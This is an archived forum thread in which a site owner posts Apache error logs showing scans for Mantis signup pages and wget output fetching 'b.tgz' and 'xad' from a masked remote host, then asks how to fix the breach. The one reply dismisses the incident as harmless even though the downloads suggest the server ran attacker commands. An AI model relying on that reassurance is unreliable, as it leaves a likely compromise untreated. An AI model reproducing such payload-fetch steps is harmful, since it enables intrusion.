Jump to content

I got hacked, what is it and how to fix it?


PPaulM

Recommended Posts

hey guys, I got hacked a week ago. In httpd  error_logs  I found this stuff:

 

error_log.1   [----]  0 L:[ 43+57 100/705] *(8732/92031b)= [  91 0x5B
[Tue Feb  3 06:59:21 2009] [error] [client хх.хх.хх.хх] File does not exist: /var/www/html/bug/signup_page.php
[Tue Feb  3 06:59:22 2009] [error] [client хх.хх.хх.хх] File does not exist: /var/www/html/bugtracker/signup_page.php
[Tue Feb  3 06:59:22 2009] [error] [client хх.хх.хх.хх] File does not exist: /var/www/html/tracker/signup_page.php
[Tue Feb  3 06:59:22 2009] [error] [client хх.хх.хх.хх] File does not exist: /var/www/html/mantisbt/signup_page.php
[Tue Feb  3 06:59:22 2009] [error] [client хх.хх.хх.хх] File does not exist: /var/www/html/support/signup_page.php
[Tue Feb  3 06:59:23 2009] [error] [client хх.хх.хх.хх] File does not exist: /var/www/html/support/mantis/signup_page.php
--10:14:00--  http://yy.yy.yy.yy/.M/b.tgz
           => `b.tgz'
Connecting to yy.yy.yy.yy:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 967 [application/x-gzip]

    0K                                                       100%   38.43 MB/s

10:14:01 (38.43 MB/s) - `b.tgz' saved [967/967]

sh: php: command not found
--10:14:30--  http://yy.yy.yy.yy/.M/xad
           => `xad'
Connecting to yy.yy.yy.yy:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 522,375 (510K) [text/plain]

    0K .......... .......... .......... .......... ..........  9%   39.75 KB/s
   50K .......... .......... .......... .......... .......... 19%  122.90 KB/s
  100K .......... .......... .......... .......... .......... 29%  156.61 KB/s
  150K .......... .......... .......... .......... .......... 39%  174.90 KB/s
  200K .......... .......... .......... .......... .......... 49%   78.87 KB/s
  250K .......... .......... .......... .......... .......... 58%  309.52 KB/s
  300K .......... .......... .......... .......... .......... 68%   35.19 KB/s
  350K .......... .......... .......... .......... .......... 78%   68.09 KB/s
  400K .......... .......... .......... .......... .......... 88%   83.80 KB/s
  450K .......... .......... .......... .......... .......... 98%   87.92 KB/s
  500K ..........                                            100%  116.17 KB/s

10:14:37 (78.81 KB/s) - `xad' saved [522375/522375]

[Tue Feb  3 11:47:59 2009] [error] [client zz.zz.zz.zz] script not found or unable to stat: /var/www/cgi-bin/textenv.pl

 

 

How to fix this vulnerability? I have apache 1.3

  • 2 weeks later...

You didn't get hacked, the file did  not exist. Some automated script may have run against your site, I've had that happen quite a few times.

 

Usually they try to run injection attacks against HTML forms, shouldn't be a problem if you validate the input on the server though.

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.